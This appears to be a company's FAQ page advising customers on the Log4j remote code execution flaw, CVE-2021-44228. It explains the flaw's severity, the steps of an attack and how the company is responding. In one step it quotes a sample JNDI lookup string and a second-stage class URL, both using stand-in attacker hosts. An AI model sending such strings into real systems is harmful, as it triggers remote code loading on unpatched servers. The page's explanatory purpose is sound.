Jump to content

Log4j Vulnerability FAQ's

We know you may have questions, so here are answers to some frequently asked questions you may have.

What happened?

On the 9th December 2021, a critical remote code execution vulnerability (CVE-2021-44228) became known, which affects Log4j versions 2.0-beta9 through 2.14.1. The Apache Software Foundation then released Log4j 2.15.0 to resolve the vulnerability.

How serious is it?

Due to the fact that it can be used for remote command execution across a wide range of software products, this is a considered a serious vulnerability. Any threat actors who are able to control log messages or log message parameters could use the vulnerability to gain full control of the affected server. There have been several reports of threat actors using this vulnerability to deploy cryptominers and other malware.

How does exploitation of this vulnerability work?

The vulnerability affects how Log4j processes log messages. By sending specially crafted messages to a system that uses Log4j, a threat actor can cause the system to load external code, an action known as remote command execution.

This is how an attack could potentially work:

  1. The threat actor submits a specially crafted string containing a malicious payload to a system that is vulnerable to CVE-2021-44228. This string could be via any field that the system logs, such as a User-Agent string, referrer, username or email address, device name, or freetext input.
  2. The string, which might be something like ${jndi:ldap://attacker.com/a} - where attacker.com is a threat actor-controlled LDAP server - is passed to Log4j for logging.
  3. The log4j vulnerability is triggered by this payload and the vulnerable system uses JNDI to query the threat actor-controlled LDAP server.
  4. The threat actor-controlled LDAP server responds with information that includes a remote Java class file (e.g., hXXp://second-stage.attacker.com/Exploit.class).
  5. This Java class is deserialized (downloaded) and executed

What software is affected?

It is impossible to produce a definitive list of all the potentially affected software. There is a wide range that could have been affected, and a comprehensive list of current known applications and vendors can be found here. NCSC has also released a non-exhaustive list of vulnerable products that you can find here.

What should I do next?

We are currently working with vendors to ensure customers are aware of any patches/mitigations that are released. Circle’s technical teams have been working to test the remediation on a number of key supported systems, and our customers have been contacted directly regarding these. We are continuing to monitor the situation and communicate any updates with our customers.

Further questions?